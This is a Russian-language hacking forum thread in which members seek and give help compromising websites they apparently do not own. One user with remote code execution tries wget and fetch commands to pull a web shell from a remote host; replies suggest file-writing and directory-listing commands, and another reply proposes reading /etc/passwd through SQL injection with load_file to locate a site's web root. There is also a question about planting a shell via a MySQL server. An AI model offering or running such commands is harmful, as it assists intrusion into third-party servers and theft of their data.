04.06.2013, 09:58
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами:
8840513
Репутация:
0
|
|
В web.config нашел такую строчку
Как подключится? Я так понял через клиент oracle, если да то где скачать клиент и как подключится?
|
|
|
05.06.2013, 14:04
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?
|
|
|
|
05.06.2013, 15:26
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Br@!ns
Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?
ну да, как и всегда стандартыми методами
|
|
|
|
05.06.2013, 17:21
|
|
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами:
7941206
Репутация:
0
|
|
Нашел сайт с RCE.
Ввожу: wget http://site.ru/shell.php
Выдает:
Сообщение от None
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@mail.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
С curl'ом такая же проблема.
Если написать просто wget:
Сообщение от None
Usage: wget [OPTION..и т.д
Остальные команды (rm\ls -la\etc) выполняет нормально.
Могу создавать файлы. Правда если:
echo > 1.php
то:
500 Internal Server Error |
|
|
|
05.06.2013, 18:20
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами:
8840513
Репутация:
0
|
|
Сообщение от OxoTnik
Программа
Navicat Premium
вот такую ошибку выдает
|
|
|
|
05.06.2013, 20:16
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Ups
Нашел сайт с RCE.
Ввожу: wget http://site.ru/shell.php
Выдает:
С curl'ом такая же проблема.
Если написать просто wget:
Остальные команды (rm\ls -la\etc) выполняет нормально.
Могу создавать файлы. Правда если:
echo > 1.php
то:
500 Internal Server Error
echo "" > 1.php
и убедись, что есть права на запись.
|
|
|
|
05.06.2013, 20:32
|
|
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами:
7941206
Репутация:
0
|
|
Сообщение от OxoTnik
попробуй через
fetch
Код:
fetch http://site.ru/shell.php
Выполнилось..но и ничего не закачалось.
|
|
|
|
05.06.2013, 20:55
|
|
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами:
7941206
Репутация:
0
|
|
Сообщение от OxoTnik
скинь в ЛС помогу, или в icq мне напиши но скорее всего нет прав,
проверить можно указав пути
Пример
system("cd /tmp/;ls -al");
Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 700 bytes)
В аську отписал.
|
|
|
|
06.06.2013, 00:45
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.
|
|
|
|
06.06.2013, 00:50
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от stan_q
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается?
load_file('/etc/passwd')
так иногда можно через скулю путь посмотреть
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
